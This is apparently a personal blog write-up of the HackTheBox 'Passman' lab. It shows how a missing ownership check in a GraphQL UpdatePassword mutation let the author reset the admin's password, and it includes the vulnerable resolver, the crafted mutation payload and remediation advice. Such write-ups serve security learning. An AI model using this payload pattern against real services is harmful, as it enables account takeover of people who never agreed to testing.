g3n3tic's Cyber Journal
About Me Machines Posts
g3n3tic's Cyber Journal

Contents

HTB Passman

   360 words   2 minutes 

Passman is an easy-rated HackTheBox machine featuring a Node.js password manager vulnerable to IDOR via GraphQL mutations. This writeup demonstrates how I exploited an authorization flaw to change admin passwords and retrieve the flag.

Box Info

NamePassman
OSLinux
DifficultyEasy
Creatorxclow3n
Release Date27 Oct 2022

Reconnaissance

Application Overview

The web application presents a password manager interface:

  • Login/Registration system

  • Dashboard to store credentials

  • GraphQL API endpoint at /graphql

Source Code Analysis

Reviewing the provided source code revealed critical insights:

  • Admin Privileges

  • Initial User Setup

Vulnerability Disclosure

GraphQL Enumeration & Flawed Authorization

After detecting the use of graphql in the application I used Burp Suite’s InQL extension and discovered a critical GraphQL mutation:

I noticed this UpdatePassword mutation here, then I checked the source code for the same and identified that there lies a flaw, and it can be use to exploit the idor vuln.

resolve: async (root, args, request) => {
    return new Promise((resolve, reject) => {
        if (!request.user) return reject(new GraphQLError('Authentication required!'));

        db.updatePassword(args.username, args.password) // No ownership check
}

Exploitation

Attack Workflow

I’ve captured the mutation request for storing passwords and modified it as per the UpdatePassword mutation

  • Intercepted AddPhrase mutation request:

    {
    "query":
        "mutation($recType: String!, $recAddr: String!, $recUser: String!, $recPass: String!, $recNote: String!) { AddPhrase(recType: $recType, recAddr: $recAddr, recUser: $recUser, recPass: $recPass, recNote: $recNote) { message } }",
    "variables":
        {"recType":"Web","recAddr":"asdf","recUser":"adf",S"recPass":"adsf","recNote":"adsf"}
}

  • Modified for UpdatePassword:

    {
    "query":
        "mutation($username: String!, $password: String!) { UpdatePassword(username: $username, password: $password) { message } }",
    "variables":
        {"username":"admin","password":"admin"}
}

  • Then changed the password of the user admin (identified from the source code)

  • And successfully logged in as a root user and retrieved flag from admin dashboard (the stored password in the dashboard is the flag)

Remediation

  • Implement Proper Authorization:
    if (currentUser !== targetUser && !currentUser.isAdmin) {
    throw new Error('Unauthorized');
}
  • GraphQL Security Best Practices:
    • Use schema directives for role-based access
    • Implement query whitelisting
    • Add rate limiting on sensitive operations

Key Takeaways

  • GraphQL introspection can reveal critical attack surfaces
  • Always validate ownership in mutation resolvers
  • Source code review often reveals logical flaws missed in black-box testing
  • Burp Suite’s InQL is invaluable for GraphQL API testing

/exit

Exploit complete. Session terminated. mic drop 🚩

Updated on 2025-08-12
Back | Home